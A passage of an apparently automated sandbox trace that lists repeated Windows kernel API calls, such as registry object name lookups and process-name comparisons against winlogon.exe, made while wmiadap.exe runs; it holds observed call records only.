| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b902c530, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b902c530, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a9b9fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x94, ret_val_ptr_out = 0xffffe0003af83ef0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b902c530, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b902c530, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a9b9c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x92, ret_val_ptr_out = 0xffffe0003af95f60 |
| ObQueryNameString | Object_ptr = 0xffffc000b902c530, Length = 0x92, ObjectNameInfo_unk_out = 0xffffe0003af95f60, ReturnLength_ptr_out = 0xffffd0002a9b9c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af95f60, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
Execution Path #170 (length: 1425, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1425 |
Processes
»
| Process | Count |
|---|---|
| Process 36 (wmiadap.exe, PID: 3776) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 | ||||
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8de98e0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8de98e0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867fb8, ret_val_out = 0xc0000004 | ||||
